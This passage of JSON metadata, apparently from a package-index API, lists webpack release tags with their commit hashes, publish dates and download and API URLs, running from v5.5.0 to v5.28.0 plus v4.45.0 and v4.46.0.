"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/